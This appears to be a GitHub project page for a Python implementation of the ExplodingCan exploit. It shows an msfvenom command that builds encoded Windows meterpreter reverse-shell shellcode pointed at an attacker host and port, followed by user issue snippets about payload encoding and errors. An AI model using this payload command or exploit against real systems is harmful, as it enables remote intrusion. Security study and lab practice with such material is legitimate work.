explodingcan
explodingcan copied to clipboard
An implementation of NSA's ExplodingCan exploit in Python
```bash sudo msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.5 LPORT=443 | tee shellcode ```
Sorry if this is a newb question :D I am a sec student I am unable to get this to work with a non-staged payload, eg) `msfvenom -p windows/shell_reverse_tcp -f...
Hi First I would to appreciate you for this great work . I need to know what the encoded of payload should I put in ? And How I can...
Hi, Each time I try to use your script on a known vulnerable machine, I have this error : > [-] 'utf16' codec can't decode byte 0x41 in position 742:...
The latest version of Python 3 had some package renamings making it not possible to run directly on py3
Hi. plz Update code and add Auto generate shell code. thanks a lot.
Hi. Plz update or help fixed Error 